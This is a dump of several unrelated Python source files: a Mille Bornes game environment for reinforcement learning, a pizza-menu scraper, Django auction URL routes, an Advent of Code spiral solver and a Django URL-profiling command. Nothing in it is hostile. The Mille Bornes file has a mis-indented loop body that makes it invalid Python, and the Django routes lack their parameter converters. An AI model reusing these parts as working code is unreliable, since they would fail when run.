Flat Tire may be last battle_pile card but with a safety the status may indicate otherwise)\n        safety_played ([str]) - card value of any safeties played (convenience function to easily identify safety cards)\n        speed_status (int) - 0 = No speed limit; 1 = Speed limit\n        battle_status (int) - 0 = Out of Gas; 1 = Flat Tire; 2 = Accident; 3 = Stop; 4 = Go\n        distance_points (int) - total distance traveled by the team\n        distance_200 (int) - number of 200 Distance cards played (max 2 per team)\n    \"\"\"\n    \n    def __init__ (self, team_number):\n        self.name = \"Team {0}\".format(team_number)\n        self.safety_pile = []\n        self.speed_pile = []\n        self.battle_pile = []\n        self.distance_pile = []\n        self.safety_played = []\n        self.speed_status = 0\n        self.battle_status = 3\n        self.distance_points = 0\n        self.distance_200 = 0\n    \n# --------------------\n# Player\nclass Player():\n    \"\"\"\n    A player (AI or human)\n    \n    Attributes:\n        name (str) - name of the player\n        team (Team) - team the player is on (to share played cards)\n        hand ([Card]) - cards the player is holding\n    \"\"\"\n    \n    def __init__ (self, name, team):\n        self.name = name\n        self.team = team\n        self.hand = []\n    \n    \n    def draw(self, deck):\n        \"\"\"\n        Draw a card if there are cards remaining\n        \"\"\"\n        \n        if len(deck.cards) > 0:\n            self.hand.append(deck.draw())\n    \n    def find_card(self, card_type, card_value):\n        \"\"\"\n        Return (Card) the first card matching the card type and value (returns None if no matching card - should be impossible and represents a programmatic error)\n        \"\"\"\n        \n        for i in range(len(self.hand)):\n            if self.hand[i].type == card_type and self.hand[i].value == card_value:\n                return self.hand.pop(i)\n        \n        return None\n    \n    def reward_last_action(self, action_history):\n        \"\"\"\n        Return the reward for the last action taken by the player\n        If player has not yet taken an action, 0 is returned\n        \"\"\"\n        # Start from the end of the Action History and add/subtract rewards until the first occurrence of the current player\n        total_reward = 0\n        last_action_found = False\n        for act in reversed(action_history):\n            if act[0] == self:\n                total_reward += act[3]\n                last_action_found = True\n                break\n            else:\n                if act[0].team == self.team:\n                    total_reward += act[3]\n                else:\n                    total_reward -= act[3]\n        \n        return total_reward if last_action_found else 0\n    \n# --------------------\n# Game\nclass Game():\n    \"\"\"\n    A single game\n    Technically a \"hand\", represents cards shuffled and played until a team reaches 1,000 distance points or no further action can be taken by any player\n    Players:\n        2 or 3 - each player is independent (team = player)\n        4 or 6 - players in pairs on teams\n    The order the players are passed determines:\n        Order of play\n        Team members:\n            4 - a & c; b & d\n            6 - a & d; b & e; c & f\n    \n    Class Variables:\n        card_matrix (list) - list of unique cards in the deck\n    \n        action_matrix (list) - list of all potential actions for the game (97 possible actions: index 0 - 96)\n    \n    Attributes:\n        teams ([Team]) - list of teams\n    \n        players ([Player]) - list of players in game play order\n    \n        player_current (Player) - the current player (set by start_turn)\n    \n        play_status (int) - indicates current status of play - used to control game flow, values:\n            0 = Normal (play advances to next player)\n            1 = Coup Fourre Check (hazard has been played, provide team players opportunity to call Coup Fourre)\n            2 = Extension Check (Current player reached 700, next action to determine if they wish to call for an Extension)\n            3 = Safety Bonus Turn (Current player played a Safety, next action to provide 
an additional bonus turn)\n            4 = Game Over\n    \n        Coup Fourre Check Handling - used when a hazard is played against a team, to check if the team wishes to call coup fourre (if possible)\n            coup_fourre_player (Player|None) - player who played the hazard card (started the coup fourre check)\n            coup_fourre_team (Team|None) - team who had the hazard played against (these players are checked for coup fourre status)\n            coup_fourre_hazard (str) - card value of the hazard played against the team (e.g. \"Out of Gas\", \"Stop\", \"Speed Limit\", etc.)\n    \n        deck (Deck) - deck of cards\n            deck.cards ([Card]) - cards not yet drawn (\"face-down on table\")\n            deck.cards_discard ([Card]) - cards discarded by players (\"face-up, out-of-play\")\n    \n        player_actions ([int]) - index list of actions the current player can take\n    \n        player_state ([int]) - list of current state of game for the current player\n    \n        action_history ([[Player, [int], int, int]]) - history/log of all actions taken in the game in order they were played, each list element contains:\n            Player - the Player who took the action\n            State - the state of the game when the player selected the action\n            Action Index - the index of the actions class variable that was taken\n            Reward - point value reward from the action (Distance card, Safety, Coup Fourre, playing all 4 safeties, etc.)\n    \n        extension_team (Team|None) - (2, 3, or 6 players) None = extended play has not been called; Team = the team who reached 700 and called for Extension\n    \n    Methods:\n        __init__ - creates a new Game object, initializes all variables, deals 6 cards to each player, starts first player (calls start_turn)\n            player_names ([str]) - list of strings, names of the players (in game play and team selection order)\n    \n        start_turn - sets current player based on play status, draws a card (if applicable), determines allowed actions for the current player\n            Note: this method is called internally, there should not be a need during normal game play to call this method explicitly\n    \n        play_action - (\"Step\") executes the desired action for the current player, sets game variables, starts next player's turn (calls start_turn) if applicable\n            action_index (int) - the index of the action to be played\n    \n        final_team_points - Return a list of final points by team in team order\n            Return ([int])\n    \n        state - Return the state for the current player\n            Return ([int])\n    \"\"\"\n    \n    # Class variables\n    card_matrix = card_matrix_build()\n    action_matrix = action_matrix_build(card_matrix)\n    \n    def __init__ (self, player_names):\n        players_count = len(player_names)\n        \n        # Setup the players\n        if players_count < 4:\n            self.teams = []\n            self.players = []\n            for i in range(players_count):\n                self.teams.append(Team(i + 1))\n                self.players.append(Player(player_names[i], self.teams[i]))\n                self.teams[i].name = f\"Team {i + 1} ({player_names[i]})\"\n        else:\n            teams_count = players_count // 2\n            self.teams = [Team(i + 1) for i in range(teams_count)]\n            self.players = [Player(player_names[i], self.teams[i % teams_count]) for i in range(players_count)]\n            for i in range(teams_count):\n                self.teams[i].name = \"Team {0} ({1})\".format(i + 1, ', '.join(player_names[i::teams_count]))\n        \n        # Setup the playing deck\n        self.deck = Deck(self.card_matrix, players_count)\n        \n        # Deal 6 cards to each player (1 card at a time to each player)\n        for i in range(6):\n            for p in self.players:\n                p.draw(self.deck)\n        \n        # Initialize current player\n        self.player_current = self.players[-1]\n        self.play_status = 0\n        \n        # Initialize Coup Fourre Check Handling\n        
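# When a hazard is played, play_action records who played it, which team\n        # may counter it, and which hazard value must be matched; start_turn\n        # (play_status == 1) then walks that team's players and offers the\n        # matching Safety before normal play resumes.\n        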
self.coup_fourre_player = None\n        self.coup_fourre_team = None\n        self.coup_fourre_hazard = None\n        \n        # Initialize player actions (int list corresponding to the index for the actions class variable)\n        self.player_actions = []\n        self.player_state = []\n        self.action_history = []\n        \n        # Extension variables\n        self.extension_check = False\n        self.extension_team = None\n        \n        # Start first player's turn\n        self.start_turn()\n    \n    def start_turn(self):\n        \"\"\"\n        Begin the next player's turn\n        \n        Play Status:\n            0 Normal - normal game play, play advances to the next player, that player draws a card and available actions are evaluated\n            1 Coup Fourre Check - a hazard has been played, players are evaluated and given the opportunity to play a counter safety\n            2 Extension Check - 2, 3, or 6 players; player reached 700 points, available actions consist of Yes/No for an Extension\n            3 Safety Bonus Turn - current player played a safety and gets a bonus turn\n        \"\"\"\n        \n        # Setup current player\n        if self.play_status == 0:\n            # Normal game play - advance to next player\n            \n            if len(self.deck.cards) > 0:\n                player_current_index = self.players.index(self.player_current)\n                player_next_index = player_current_index + 1 if player_current_index < len(self.players) - 1 else 0\n                self.player_current = self.players[player_next_index]\n                self.player_current.draw(self.deck)\n            \n            else:\n                # No cards left in the deck, advance to the next player with cards remaining in their hand\n                player_index = self.players.index(self.player_current)\n                player_next_index = -1\n                \n                while player_next_index == -1:\n                    player_index = player_index + 1 if player_index < len(self.players) - 1 else 0\n                    if len(self.players[player_index].hand) > 0:\n                        player_next_index = player_index\n                \n                self.player_current = self.players[player_next_index]\n        \n        elif self.play_status == 1:\n            # Coup Fourre Check - Hazard has been played\n            player_index = self.players.index(self.player_current)\n            player_next_index = -1\n\n            while player_next_index == -1:\n                player_index = player_index + 1 if player_index < len(self.players) - 1 else 0\n\n                if self.players[player_index].team == self.coup_fourre_team:\n                    # Found next player on the team\n                    player_next_index = player_index\n                    self.player_current = self.players[player_next_index]\n                    \n                    # Evaluating action will determine if this player has the safety (this will take care of instance where person has no cards as well)\n                    \n                elif self.players[player_index] == self.coup_fourre_player:\n                    # This is the player that played the hazard to begin with\n                    \n                    # Turn off the coup fourre check variables to exit the coup fourre check (return to normal play)\n                    self.play_status = 0\n                    self.coup_fourre_player = None\n                    self.coup_fourre_team = None\n                    self.coup_fourre_hazard = None\n                    \n                    # Play returns to next player with cards in their hand\n                    while player_next_index == -1:\n                        player_index = player_index + 1 if player_index < len(self.players) - 1 else 0\n                        if len(self.players[player_index].hand) > 0:\n                            player_next_index = player_index\n                    \n                    self.player_current = self.players[player_next_index]\n                    \n                    # Draw to start new turn (normal play)\n                    self.player_current.draw(self.deck)\n        \n        elif self.play_status == 3:\n            # Extra turn - set to current player unless they do not have any cards (then next player with cards)\n            player_index = self.players.index(self.player_current)\n            player_next_index = -1\n            \n            while player_next_index == -1:\n                if len(self.players[player_index].hand) > 0:\n                    player_next_index = player_index\n                else:\n                    player_index = player_index + 1 if player_index < 
len(self.players) - 1 else 0\n            \n            self.player_current = self.players[player_next_index]\n            self.player_current.draw(self.deck)\n        \n        # Note: Extension Check and Safety Bonus Turn - current player does not change\n        \n        # State-Action space: populate current game state and possible actions\n        self.player_state = self.state()\n        self.player_actions = actions_space(self.player_state, self.card_matrix, self.action_matrix)\n        \n        # If the play status was 2 (Extension check) or 3 (extra turn), set it back to 0 (normal) as the next action will resolve these\n        if self.play_status == 2 or self.play_status == 3:\n            self.play_status = 0\n        \n        if len(self.player_actions) == 0:\n            # No actions possible for current player, start next player's turn\n            self.start_turn()\n    \n    def play_action(self, action_index):\n        \"\"\"\n        Plays selected action and ends the player's turn\n        \"\"\"\n        \n        # Retrieve information about the action to take\n        action = self.action_matrix[action_index]\n        if action[1] == \"Coup Fourre\":\n            played_card = None if action[2] == \"Do not play\" else self.player_current.find_card(\"Safety\", action[2])\n        elif action[1] == \"Extension\":\n            played_card = None\n        else:\n            played_card = self.player_current.find_card(action[1], action[2])\n        \n        # Action history\n        # Initialize reward to 0\n        # This implementation allows for:\n        #    Adding additional history entries where Extension is achieved by non-calling team\n        #    The reference to the current player is not altered and represents the true current player\n        action_history_add = [[self.player_current, self.player_state, action_index, 0]]\n        \n        if action[0] == -1:\n            # Discard the selected card\n            self.deck.cards_discard.append(played_card)\n        \n        elif action[1] == \"Distance\":\n            # Add card to team's Distance Pile\n            self.player_current.team.distance_pile.append(played_card)\n            \n            # Increment team's distance points\n            self.player_current.team.distance_points += action[2]\n            \n            # If 200, increment team's 200 card counter\n            if action[2] == 200:\n                self.player_current.team.distance_200 += 1\n            \n            # Increment action reward for point value\n            action_history_add[0][3] += action[2]\n            \n            # Check End of Game and Extension\n            team_points = self.player_current.team.distance_points\n            \n            if len(self.players) != 4:\n                # Extension play possible\n                \n                if self.extension_team is None and team_points == 700:\n                    # Player can call Extension if desired (change play status for next setup)\n                    self.play_status = 2\n                elif self.extension_team is not None and team_points == 1000:\n                    # End Game: Player has reached Extension\n                    \n                    # Add reward points for: trip completed (400)\n                    action_history_add[0][3] += 400\n                    \n                    # Add reward points for extension\n                    action_history_add[0][3] += 200\n                    \n                    # If player's team is not the team that called the extension, give 200 points to other team (if applicable) as well\n                    if self.extension_team != self.player_current.team:\n                        for t in self.teams:\n                            if t != self.player_current.team and t != self.extension_team:\n                                player_representative = [p for p in self.players if p.team == t][0]\n                                action_history_add.append([player_representative, [], -1, 200])\n                    \n                    # Add reward points if Shut-out (500)\n                    shut_out_achieved = True\n                    for t in self.teams:\n                        if t != self.player_current.team and t.distance_points > 0:\n                            shut_out_achieved = False\n                            break\n                    \n                    if shut_out_achieved == True:\n                        action_history_add[0][3] += 500\n                    \n                    # Add reward points if delayed action (300)\n                    if len(self.deck.cards) == 0:\n                        action_history_add[0][3] += 300\n                    \n                    # Add reward points if safe trip (no 200's) (300)\n                    if 
self.player_current.team.distance_200 == 0:\n                        action_history_add[0][3] += 300\n                    \n                    # Set the Game Over variable\n                    self.play_status = 4\n            \n            elif team_points == 1000:\n                # End Game: Team has reached 1,000 points\n                \n                # Add reward points for: trip completed (400)\n                action_history_add[0][3] += 400\n\n                # Add reward points if Shut-out (500)\n                shut_out_achieved = True\n                for t in self.teams:\n                    if t != self.player_current.team and t.distance_points > 0:\n                        shut_out_achieved = False\n                        break\n\n                if shut_out_achieved == True:\n                    action_history_add[0][3] += 500\n\n                # Add reward points if delayed action (300)\n                if len(self.deck.cards) == 0:\n                    action_history_add[0][3] += 300\n\n                # Add reward points if safe trip (no 200's) (300)\n                if self.player_current.team.distance_200 == 0:\n                    action_history_add[0][3] += 300\n\n                # Set the Game Over variable\n                self.play_status = 4\n        \n        elif action[1] == \"Remedy\":\n            # Remedy type: Speed or Battle\n            if action[2] == \"End of Limit\":\n                # Add card to team's Speed Pile\n                self.player_current.team.speed_pile.append(played_card)\n                \n                # Update team's Speed status\n                self.player_current.team.speed_status = 0\n            \n            else:\n                # Add card to team's Battle Pile\n                self.player_current.team.battle_pile.append(played_card)\n                \n                # Update team's Battle status\n                if action[2] == \"Roll\" or 'Right-of-Way' in self.player_current.team.safety_played:\n                    self.player_current.team.battle_status = 4\n                else:\n                    self.player_current.team.battle_status = 3\n        \n        elif action[1] == \"Hazard\":\n            # Team receiving hazard\n            team_hazard = self.teams[action[0]]\n            \n            if action[2] == \"Speed Limit\":\n                # Add card to team's Speed Pile\n                team_hazard.speed_pile.append(played_card)\n                \n                # Update team's Speed status\n                team_hazard.speed_status = 1\n            \n            else:\n                # Add card to team's Battle Pile\n                team_hazard.battle_pile.append(played_card)\n                \n                # Update team's Battle status\n                team_hazard.battle_status = [\"Out of Gas\", \"Flat Tire\", \"Accident\", \"Stop\"].index(action[2])\n            \n            # Coup Fourre check - setup variable to begin the process of checking for coup fourre\n            self.play_status = 1\n            self.coup_fourre_player = self.player_current\n            self.coup_fourre_team = team_hazard\n            self.coup_fourre_hazard = action[2]\n        \n        elif action[1] == \"Safety\" or action[1] == \"Coup Fourre\":\n            # Safety played (Coup Fourre logic is similar, using same code block to reduce redundant code)\n            \n            if action[2] != \"Do not play\":\n                # A Safety or Coup Fourre has been played\n                \n                # Add card to team's safety pile\n                self.player_current.team.safety_pile.append(played_card)\n                \n                # Add the card's value to the team's safety played\n                self.player_current.team.safety_played.append(action[2])\n                \n                # Add reward points for safety played (100)\n                action_history_add[0][3] += 100\n                \n                # Add reward points if all 4 safeties played by this team (300)\n                if len(self.player_current.team.safety_played) == 4:\n                    action_history_add[0][3] += 300\n                \n                # Process the Speed Pile/Status (only for \"Right-of-Way\")\n                if action[2] == \"Right-of-Way\" and self.player_current.team.speed_status == 1:\n                    # Top card of speed pile is a Speed Limit; it is possible, however, that multiple Speed Limit cards are stacked\n                    while len(self.player_current.team.speed_pile) > 0 and self.player_current.team.speed_pile[-1].value == \"Speed Limit\":\n                        self.deck.cards_discard.append(self.player_current.team.speed_pile.pop())\n\n                    # Team should no longer have a Speed Limit applied\n                    self.player_current.team.speed_status = 0\n\n                # Process the Battle Pile/Status\n                battle_pile_process = True\n\n                while 
battle_pile_process:\n                # Are there cards left?\n                if len(self.player_current.team.battle_pile) > 0:\n                    top_card = self.player_current.team.battle_pile[-1]\n                    \n                    # Is the top card a Remedy?\n                    if top_card.type == \"Remedy\":\n                        # Team can \"Go\" (whatever last issue was, it was fixed)\n                        self.player_current.team.battle_status = 4\n                        battle_pile_process = False\n                    else:\n                        # Top card is a Hazard; does the team have the corresponding Safety?\n                        safety_value = safety_counter(top_card.value)\n                        if safety_value in self.player_current.team.safety_played:\n                            # Remove the card and keep processing\n                            self.deck.cards_discard.append(self.player_current.team.battle_pile.pop())\n                        else:\n                            # Team does not have a Safety, the hazard applies\n                            self.player_current.team.battle_status = [\"Out of Gas\", \"Flat Tire\", \"Accident\", \"Stop\"].index(top_card.value)\n                            battle_pile_process = False\n                else:\n                    # No more cards left to process, team can \"Go\"\n                    self.player_current.team.battle_status = 4\n                    battle_pile_process = False\n            \n            # Was the Safety played as a Coup Fourre?\n            if action[1] == \"Coup Fourre\":\n                # Add reward points for Coup Fourre\n                action_history_add[0][3] += 300\n                \n                # Player now has one less card, immediately draw a card\n                self.player_current.draw(self.deck)\n                \n                # Set all coup fourre variables to None (clear the coup fourre check)\n                self.coup_fourre_player = None\n                self.coup_fourre_team = None\n                self.coup_fourre_hazard = None\n                \n                # Player gets a bonus turn\n                self.play_status = 3\n        \n        elif action[1] == \"Extension\":\n            # Player has responded to Extension option\n            \n            if action[2] == \"Yes\":\n                # Extension mode should be enabled\n                self.extension_team = self.player_current.team\n            \n            else:\n                # End Game: Player does not want to enter extension, end of game has been reached\n                \n                # Add reward points for: trip completed (400)\n                action_history_add[0][3] += 400\n\n                # Add reward points if Shut-out (500)\n                shut_out_achieved = True\n                for t in self.teams:\n                    if t != self.player_current.team and t.distance_points > 0:\n                        shut_out_achieved = False\n                        break\n\n                if shut_out_achieved == True:\n                    action_history_add[0][3] += 500\n\n                # Add reward points if delayed action (300)\n                if len(self.deck.cards) == 0:\n                    action_history_add[0][3] += 300\n\n                # Add reward points if safe trip (no 200's) (300)\n                if self.player_current.team.distance_200 == 0:\n                    action_history_add[0][3] += 300\n\n                # Set the Game Over variable\n                self.play_status = 4\n        \n        # Store action history\n        self.action_history.extend(action_history_add)\n        \n        # Move to next player (or End Game)\n        if self.play_status < 4:\n            # Ensure there are either cards left in the deck or at least one player has a card left in their hand\n            if len(self.deck.cards) > 0 or sum([len(p.hand) for p in self.players]) > 0:\n                self.start_turn()\n            else:\n                # Game Over (no more plays possible)\n                self.play_status = 4\n    \n    def final_team_points(self):\n        \"\"\"\n        Return a list of final points by team\n        \"\"\"\n        \n        team_points = [0 for i in range(len(self.teams))]\n        \n        for act in self.action_history:\n            team_idx = self.teams.index(act[0].team)\n            team_points[team_idx] += act[3]\n        \n        return team_points\n    \n    def state(self):\n        \"\"\"\n        Return the state for the current player\n        \n        List structure (by index) - shape(47,)\n            0 Number of players (2, 3, 4, 6)\n            1 Game play status (0 = Normal; 1 = Coup Fourre check; 2 = Extension check; 3 = Bonus turn)\n            2 Extension team (-1 = Not in extension play; 0-2 = Team index who called for an extension)\n            3 Current player team number index (0, 1, 2)\n            4 Number of cards left in deck 
(unplayed; a recognition that this is not an infinite horizon)\n            5-15 Action (index) history taken by other players prior to the current player's turn (-1 for n/a); most recent action first (reverse order)\n            16 Team 1 Speed Status (0 = No speed limit; 1 = Speed Limit)\n            17 Team 1 Battle Status (0 = Out of Gas; 1 = Flat Tire; 2 = Accident; 3 = Stop; 4 = Go)\n            18 Team 1 Distance points\n            19 Team 1 Number of 200 distance point cards played (0, 1, 2)\n            20 Team 1 Extra Tank (0 = No; 1 = Yes)\n            21 Team 1 Puncture Proof (0 = No; 1 = Yes)\n            22 Team 1 Driving Ace (0 = No; 1 = Yes)\n            23 Team 1 Right-of-Way (0 = No; 1 = Yes)\n            24-31 Team 2 (same as Team 1)\n            32-39 Team 3 (same as Team 1) (-1 for n/a)\n            40-46 Cards (index) in current player hand (-1 for n/a)\n        \n        Notes:\n            The following game elements are not included in the state. I am beginning with \"minimal\" information.\n            \n            A key strategy is counting cards, for example, counting the number of \"Accident\" cards already played. This can influence discarding extra Repairs remedy cards.\n                Currently, this is not explicitly in the State\n                The prior actions taken since the last turn are in the State; the model could potentially learn from this component of the state\n            \n            Another important component of the game is to know the relationship among cards (e.g. Out of Gas > Gasoline > Extra Tank).\n                I am not certain if/how to model this to assist with training an optimal policy\n\n        \"\"\"\n        \n        state_list = [-1] * 47\n        \n        # Number of players\n        state_list[0] = len(self.players)\n        \n        # Game play status\n        state_list[1] = self.play_status\n        \n        # Extension team\n        state_list[2] = -1 if self.extension_team is None else self.teams.index(self.extension_team)\n        \n        # Current Player's Team Index\n        state_list[3] = self.teams.index(self.player_current.team)\n        \n        # Number of cards left in deck\n        state_list[4] = len(self.deck.cards)\n        \n        # Action History since player's last turn\n        i = 5\n        for act in reversed(self.action_history):\n            if act[0] == self.player_current:\n                break\n            else:\n                state_list[i] = act[2]\n                i += 1\n        \n        # Teams info\n        i = 16\n        for t in self.teams:\n            state_list[i] = t.speed_status\n            i += 1\n            state_list[i] = t.battle_status\n            i += 1\n            state_list[i] = t.distance_points\n            i += 1\n            state_list[i] = t.distance_200\n            i += 1\n            state_list[i] = 1 if \"Extra Tank\" in t.safety_played else 0\n            i += 1\n            state_list[i] = 1 if \"Puncture-Proof\" in t.safety_played else 0\n            i += 1\n            state_list[i] = 1 if \"Driving Ace\" in t.safety_played else 0\n            i += 1\n            state_list[i] = 1 if \"Right-of-Way\" in t.safety_played else 0\n            i += 1\n        \n        # Cards in current player's hand\n        i = 40\n        for c in self.player_current.hand:\n            state_list[i] = self.card_matrix.index([c.type, c.value])\n            i += 1\n        \n        return state_list\n    ","repo_name":"JMBoggess/Mille-Bornes","sub_path":"environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":43282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"9848702539","text":"from bs4 import BeautifulSoup\n\n\ndef getPizzas():\n    with open('home.html', 'r') as html_file:\n        content = html_file.read()\n        beautiful_soup = BeautifulSoup(content, 'html.parser')\n        pizza_cards = beautiful_soup.find_all('div', class_='card')\n        for index, pizza in enumerate(pizza_cards):\n            pizza_name = pizza.h5.text\n            pizza_price = pizza.a.text.split(' ')[-1]\n            with open(f'pizza_info/{index}.txt', 'w') as files:\n                files.write(f'{pizza_name} goes for price {pizza_price}')\n\n\nif __name__ == '__main__':\n    
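# Note: getPizzas assumes that home.html and a pizza_info/ directory already\n    # exist alongside this script; creating the directory first, e.g. with\n    # os.makedirs('pizza_info', exist_ok=True), avoids a FileNotFoundError.\n    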
getPizzas()\n","repo_name":"Kymoraa/web_scraping","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"26125830579","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n    path(\"\", views.index, name=\"index\"),\n    path(\"login\", views.login_view, name=\"login\"),\n    path(\"logout\", views.logout_view, name=\"logout\"),\n    path(\"register\", views.register, name=\"register\"),\n    path(\"create_listing\", views.create_listing, name='createlisting'),\n    path(\"item=\", views.item_detail, name='item_detail'),\n    path(\"close_bid/item=\", views.close_bid, name='close_bid'),\n    path(\"add_comment/item=\", views.add_comment, name='add_comment'),\n    path(\"closed_listing\", views.closed_listing, name='closed_listing'),\n    path(\"add_watchlist/item=\", views.add_watchlist, name='add_watchlist'),\n    path(\"remove_watchlist/item=\", views.remove_watchlist, name='remove_watchlist'),\n    path(\"watchlist\", views.view_watchlist, name='view_watchlist'),\n    path(\"categories\", views.categories, name='categories'),\n    path(\"category=\", views.category_listing, name='category_listing')\n]\n","repo_name":"FuadGoloba/Havard-CS50W-Django-Projects","sub_path":"Project 2 - Commerce/commerce/commerce/auctions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"512546349","text":"inp = 368078\nimport collections\ndata = collections.defaultdict(dict)\n\ndef calc_coords(n):\n    if n < 1:\n        raise ValueError(\"N must be 1 or higher\")\n    max_x = 0\n    max_y = 0\n    curr_x = 0\n    curr_y = 0\n    x_direction = \"right\"\n    y_direction = \"up\"\n    first_bigger = True\n\n    for i in range(n-1):\n        #print(\"State: mx:{} my:{} cx:{} cy:{} xd:{} yd:{}\".format(max_x, max_y, curr_x, curr_y, x_direction, y_direction))\n        \n        # Assign data as sum of surrounding blocks\n        sum_data = 0\n        for x in range(-1, 2):\n            for y in range(-1, 2):\n                try:\n                    sum_data += data[curr_x+x][curr_y+y]\n                except KeyError:\n                    pass\n        if curr_x == 0 and curr_y == 0:\n            sum_data = 1\n        data[curr_x][curr_y] = sum_data\n        if first_bigger and sum_data > n:\n            print(\"Value written {} was first bigger than input {}\".format(sum_data, n))\n            first_bigger = False\n\n        if x_direction == \"right\" and y_direction == \"up\":\n            # Going right on the bottom\n            if curr_x <= max_x:\n                if curr_x == max_x:\n                    max_x += 1\n                    x_direction = \"left\"\n                curr_x += 1\n            else:\n                raise ValueError(\"Maximum x was {} but current x was {}!\".format(max_x, curr_x))\n        elif x_direction == \"right\" and y_direction == \"down\":\n            # Going down on the left side\n            if curr_y > -max_y:\n                if curr_y == -(max_y-1):\n                    y_direction = \"up\"\n                curr_y -= 1\n            else:\n                raise ValueError(\"Minimum y was {} but current y was {}\".format(-max_y, curr_y))\n        elif x_direction == \"left\" and y_direction == \"up\":\n            # Going up on the right side\n            if curr_y <= max_y:\n                if curr_y == max_y:\n                    max_y += 1\n                    y_direction = \"down\"\n                curr_y += 1\n            else:\n                raise ValueError(\"Maximum y was {} but current y was {}\".format(max_y, curr_y))\n        elif x_direction == \"left\" and y_direction == \"down\":\n            # Going left on the top\n            if curr_x > -max_x:\n                if curr_x == -(max_x-1):\n                    x_direction = \"right\"\n                curr_x -= 1\n            else:\n                raise ValueError(\"Minimum x was {} but current x was {}\".format(-max_x, curr_x))\n        else:\n            raise ValueError(\"Impossible situation! 
xdir: {} ydir: {}\".format(x_direction, y_direction))\n\n    print(\"{} is at coordinates {},{}\".format(n, curr_x, curr_y))\n    return curr_x, curr_y\n\n\ndef manhattan_distance(x, y):\n    # Calculate manhattan distance between input and 0,0\n    return abs(x)+abs(y)\n\n\nif __name__ == \"__main__\":\n    import sys\n    if len(sys.argv) > 1:\n        inp = int(sys.argv[1])\n    x, y = calc_coords(inp)\n\n    print(\"Manhattan distance = {}\".format(manhattan_distance(x, y)))\n\n","repo_name":"Kurocon/AdventOfCode2017","sub_path":"day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":2996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"3065106272","text":"from django.core.management.base import BaseCommand\nfrom django.core.management import call_command\nimport json\nfrom django.conf import settings\nimport requests\nfrom django.test.client import Client\nimport logging\nfrom django_web_profiler.models import ProfileLog, ProfileLogRecord\nimport collections\nfrom datetime import datetime\n\n\nclass Command(BaseCommand):\n    args = ''\n    help = 'Loads the initial data into the database'\n\n    def handle(self, *args, **options):\n        client = Client()\n        logger1 = logging.getLogger(\"request-logging\")\n        profile_log = ProfileLog.objects.create(name=datetime.now(), start_time=datetime.now())\n\n        for url in settings.URLS:\n            response = client.get(url, DJANGO_DEBUG_LOGGING=True)\n            request = response.wsgi_request\n            statistics = request.statistics\n            total_time = total_user_cpu_time = total_system_cpu_time = total_sql_time = 0.0\n            total_sql_queries = total_cache_hits = total_cache_misses = 0\n\n            if settings.DEBUG:\n                cache_calls = {k:i for i,k in enumerate(statistics['cache_counts'])}\n\n                total_time += statistics['total_cpu_time']\n                total_user_cpu_time += statistics['user_cpu_time']\n                total_system_cpu_time += statistics['system_cpu_time']\n                total_sql_time += statistics['sql_total_time']\n                total_sql_queries += statistics['num_queries']\n                total_cache_hits += statistics['cache_total_calls']\n                total_cache_misses += statistics['cache_misses']\n                ProfileLogRecord.objects.create(profile_log=profile_log, request_path=statistics['path'], ip_address=statistics['ip_address'], device=statistics['device'],\n                                                timer_utime=statistics['user_cpu_time'], timer_stime=statistics['system_cpu_time'], timer_cputime=statistics['total_cpu_time'],\n                                                sql_num_queries=statistics['num_queries'], sql_time=statistics['sql_total_time'], sql_queries=statistics['num_queries'],\n                                                cache_num_calls=statistics['cache_total_calls'], cache_time=statistics['cache_total_time'], cache_hits=statistics['cache_hits'], cache_misses=statistics['cache_misses'],\n                                                cache_sets=cache_calls['set'], cache_gets=cache_calls['get'], cache_get_many=cache_calls['get_many'], cache_deletes=cache_calls['delete'], cache_calls=statistics['cache_total_calls'])\n\n            else:\n                total_time += float(statistics['total_cpu_time'])\n                total_user_cpu_time += float(statistics['user_cpu_time'])\n                total_system_cpu_time += float(statistics['system_cpu_time'])\n\n                ProfileLogRecord.objects.create(profile_log=profile_log, request_path=statistics['path'], ip_address=statistics['ip_address'], device=statistics['device'],\n                                                timer_utime=statistics['user_cpu_time'], timer_stime=statistics['system_cpu_time'], timer_cputime=statistics['total_cpu_time'])\n        profile_log_records = ProfileLogRecord.objects.filter(profile_log=profile_log)\n        profile_log.total_requests = len(settings.URLS)\n        profile_log.avg_time = (total_time/len(settings.URLS))\n        
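# With N = len(settings.URLS) profiled requests, avg_time = total_time / N;\n        # the same N normalizes avg_cpu_time below.\n        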
profile_log.total_time = total_time\n        profile_log.avg_cpu_time = total_user_cpu_time/len(settings.URLS)\n        profile_log.total_user_cpu_time = total_user_cpu_time\n        profile_log.total_system_cpu_time = total_system_cpu_time\n        profile_log.end_time = datetime.now()\n        profile_log.save()\n\n        result = {'message': \"Successfully loaded initial data\"}\n\n        return json.dumps(result)\n","repo_name":"MicroPyramid/django-web-profiler","sub_path":"django_web_profiler/management/commands/logging_urls.py","file_name":"logging_urls.py","file_ext":"py","file_size_in_byte":3799,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"72"}
